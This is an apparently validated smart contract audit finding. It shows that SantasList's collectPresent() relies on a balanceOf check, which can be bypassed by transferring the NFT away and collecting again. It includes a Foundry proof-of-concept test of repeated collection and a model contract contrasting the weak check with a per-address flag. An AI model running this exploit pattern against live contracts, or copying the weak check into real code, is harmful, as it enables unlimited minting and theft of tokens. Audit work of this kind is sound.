Submission Details
Severity: high
Valid

Presents can be collected multiple times with a single address

Summary

An attacker can collect presents an unlimited number of times using only one valid address.

Vulnerability Details

The function collectPresent() is meant to limit each valid address to a single collection by checking the caller's balance: if (balanceOf(msg.sender) > 0). An attacker can easily bypass this check by sending the token to another address before calling collectPresent() again.

Test code for POC:

function testCanCollectPresentAfterAlreadyCollected() public {
    // santa marks the user as NICE in both passes
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.NICE);
    santasList.checkTwice(user, SantasList.Status.NICE);
    vm.stopPrank();
    // move time past the collection start
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
    vm.startPrank(user);
    santasList.collectPresent();
    // transfer nft to user2 so that balanceOf(user) is 0 again
    santasList.safeTransferFrom(user, user2, 0);
    // collect present again
    santasList.collectPresent();
    // transfer nft to user2
    santasList.safeTransferFrom(user, user2, 1);
    // collect present again
    santasList.collectPresent();
}

Impact

An attacker can mint an unlimited amount of santasList NFTs and santasToken.

Tools Used

Manual Review & Foundry

Recommendations

Implement a mapping from address to a collected status that records whether that address has already called collectPresent(), e.g.: mapping(address => bool) collectedPreson
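The weak check next to the recommended per-address flag, as an added example that is not the audited SantasList code. The contract name, transferOne, hasCollected and both collectPresent variants are hypothetical; the token is reduced to a balance map so the file compiles without imports, and the NICE-status and time checks are left out.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example: a minimal model of the claim logic, not the project's contract.
contract PresentClaimModel {
    error AlreadyCollected();

    // Stands in for the ERC721 balanceOf(address) the finding refers to.
    mapping(address => uint256) public balanceOf;
    // Hypothetical name for the mapping the recommendation asks for.
    mapping(address => bool) public hasCollected;

    // Stands in for safeTransferFrom: moves one token out of the caller's balance.
    function transferOne(address to) external {
        balanceOf[msg.sender] -= 1; // reverts on underflow under 0.8.x
        balanceOf[to] += 1;
    }

    // Weak form: eligibility is derived from a balance the holder controls.
    // After transferOne(), balanceOf(msg.sender) is 0 and the check passes again.
    function collectPresentWeak() external {
        if (balanceOf[msg.sender] > 0) revert AlreadyCollected();
        balanceOf[msg.sender] += 1;
    }

    // Hardened form: eligibility is a one-way flag keyed by address.
    // Transferring the token away does not clear it.
    function collectPresentFixed() external {
        if (hasCollected[msg.sender]) revert AlreadyCollected();
        // Set the flag before minting so that a receiver callback fired by a
        // safe mint cannot re-enter while the flag is still false.
        hasCollected[msg.sender] = true;
        balanceOf[msg.sender] += 1;
    }
}
```

Against the fixed variant, the second collectPresent() call in the PoC sequence reverts with AlreadyCollected, regardless of where the first token was sent.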

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
